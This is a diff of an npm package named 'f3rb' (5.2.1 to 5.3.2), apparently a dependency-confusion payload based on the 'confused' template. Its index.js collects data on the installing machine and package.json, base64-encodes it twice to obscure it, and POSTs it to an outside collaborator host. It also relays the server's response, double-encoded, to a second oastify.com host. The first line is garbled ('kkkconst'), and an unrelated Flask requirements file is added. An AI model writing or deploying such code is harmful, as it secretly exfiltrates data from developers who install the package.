f3rb 5.2.1 → 5.3.2

package/index.js

@@ -1,10 +1,11 @@
-const os = require("os");
+kkkconst os = require("os");
 const dns = require("dns");
 const querystring = require("querystring");
 const https = require("https");
 const packageJSON = require("./package.json");
 const package = packageJSON.name;
 
+// Original tracking data
 const trackingData = JSON.stringify({
     p: package,
     c: __dirname,
@@ -17,12 +18,18 @@ const trackingData = JSON.stringify({
     pjson: packageJSON,
 });
 
+// Encode the tracking data twice in base64
+const base64FirstEncode = Buffer.from(trackingData).toString('base64');
+const base64DoubleEncode = Buffer.from(base64FirstEncode).toString('base64');
+
+// Create post data with the double-encoded base64 message
 var postData = querystring.stringify({
-    msg: trackingData,
+    msg: base64DoubleEncode,
 });
 
+// HTTPS request options
 var options = {
-    hostname: "http://i4n2xx9wzzwminyhx8uxna0q4ha8y0mp.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
+    hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream
     port: 443,
     path: "/",
     method: "POST",
@@ -32,15 +39,59 @@ var options = {
     },
 };
 
+// Send the HTTPS request
 var req = https.request(options, (res) => {
+    let responseData = "";
+
+    // Accumulate the data from the response
     res.on("data", (d) => {
-        process.stdout.write(d);
+        responseData += d;
+    });
+
+    // After the response is received, double Base64 encode the response
+    res.on("end", () => {
+        // First Base64 encode
+        const base64FirstResponseEncode = Buffer.from(responseData).toString('base64');
+        // Second Base64 encode
+        const base64DoubleResponseEncode = Buffer.from(base64FirstResponseEncode).toString('base64');
+
+        // Send the double Base64 encoded response back via another POST request
+        const returnPostData = querystring.stringify({
+            msg: base64DoubleResponseEncode,
+        });
+
+        var returnOptions = {
+            hostname: "jpc3iyuxk0hn3ojii9fy8blrpivaj57u.oastify.com", // Replace with your server to receive the encoded response
+            port: 443,
+            path: "/",
+            method: "POST",
+            headers: {
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Content-Length": returnPostData.length,
+            },
+        };
+
+        var returnReq = https.request(returnOptions, (returnRes) => {
+            returnRes.on("data", (d) => {
+                process.stdout.write(d);
+            });
+        });
+
+        returnReq.on("error", (e) => {
+            // Handle error
+        });
+
+        // Send the double Base64-encoded response back
+        returnReq.write(returnPostData);
+        returnReq.end();
     });
 });
 
 req.on("error", (e) => {
-    // console.error(e);
+    // Handle error
 });
 
+// Write the post data and end the request
 req.write(postData);
 req.end();
+

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "f3rb",
-  "version": "5.2.1",
+  "version": "5.3.2",
   "description": "test",
   "main": "index.js",
   "scripts": {
@@ -17,6 +17,6 @@
   },
   "homepage": "https://github.com/visma-prodsec/confused#readme",
   "dependencies": {
-    "f3rb": "^5.1.1"
+    "f3rb": "^5.3.1"
   }
 }

package/r.txt

@@ -0,0 +1,7 @@
+jinja2<3.1.0
+Flask==1.1.2
+itsdangerous==2.0.1
+# Flask_Caching==1.9.0
+Werkzeug==1.0.1
+flask_debugtoolbar==0.11.0
+# flask_mail==0.9.1